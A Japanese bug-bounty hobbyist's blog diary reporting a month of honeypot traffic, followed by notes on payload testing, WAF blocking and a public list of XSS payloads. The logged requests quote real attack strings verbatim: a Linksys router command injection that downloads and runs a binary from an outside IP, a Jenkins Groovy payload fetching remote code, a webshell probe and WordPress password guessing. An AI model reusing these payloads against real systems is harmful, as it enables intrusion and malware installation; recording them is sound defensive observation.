【BugBounty】 2019年6月1日 活動日記【Honeypot】

f:id:NickShadows:20190601225301j:plain:w600

※hackerone経由で公式にwebの調査をしています。

ハニーポット

トップ画面

f:id:NickShadows:20190601223825p:plain:w600


直近1ヶ月折れ線グラフ

f:id:NickShadows:20190601223853p:plain:w600


GETリクエスト
no uri Co
1 / 57
2 *1 5
3 /wp-login.php 4
4 /api/.env 2
5 /api/v1/pods 1
6 /shellinvoker/shellinvoker.jsp?ppp=echo%20abcxd 1

*1

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27NsGdMJsD%27,%20root=%27http[:]//185.162.235.211%27)%0a@Grab(group=%27package%27,%20module=%27NsGdMJsD%27,%20version=%271%27)%0aimport%20NsGdMJsD;


POSTリクエスト
No uri request_body Co
1 /wp-login.php log=admin&pwd=&wp-submit=Log In&redirect_to=http[:]//52.14.60.236/wp-admin/&testcookie=1 2
2 /tmUnblock.cgi ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1 1
3 /wp-login.php log=&pwd=admin&wp-submit=Log In&redirect_to=http[:]//52.14.60.236/wp-admin/&testcookie=1 1
4 /wp-login.php log=&pwd=admin123&wp-submit=Log In&redirect_to=http[:]//52.14.60.236/wp-admin/&testcookie=1 1


pypmyadminユーザー

アクセスなし


pypmyadminパスワード

アクセスなし


wordpressユーザー
no user Co
1 admin 2
2 2


wordpressパスワード
no pwd Co
1 null 2
2 admin 1
3 admin123 1


tomcatユーザー

アクセスなし


tomcatパスワード

アクセスなし


直近24時間新着アクセス

なし


まとめ

久々にwordpressが来たって感じすね。
アクセスがしょぼすぎたので、独自ドメイン買って紐づけました。
その関係でIPアドレスも変わったので、どうなるか楽しみです。

バグバウンティ

やろうとしたこと
  1. js難読化解読ツールの検証
  2. 実践
やったこと
  1. 実践

1.実践

情報調べて、サイトみて、ペイロード流してみてをやりました。
課題は2つ。

  1. Intruderが遅い
  2. WAF対策

pro版の手続きが終わってないので、pro版が使えません。
Intruderがとても遅いです。


また、どことは(多分)言えませんが、WAF対策がいるなと思いました。
めっちゃブロックされます。


海外の記事でBypassがうんたらってよく見ますが、公表してもいいんですかね? バグバウンティの対象さえ漏らさなければpayloadとしてはありですかね。


次やりたいこと
  1. js難読化解読ツールの検証
  2. 実践

気になったニュースなど

www.youtube.com

WannaCryの解説をしている動画。
ゆっくりベースなので娯楽としても良い。


日本語でマルウェアなどセキュリティ関連のYoutubeって少ないなーって思ってましたが、出始めたようですね。
海外ならバシバシあるんですが、英語なのでゼンゼンわかりません。
翻訳助けて!

github.com

very good :)
Too much to be sorted out.


というわけで、9000くらいあるXSSのpayloadが公表されていました。
このまま使うにも、9000をいっきに投げるわけにはいかないので、どうするものかと。
しばらくは辞書的に使おうかなと思ってます。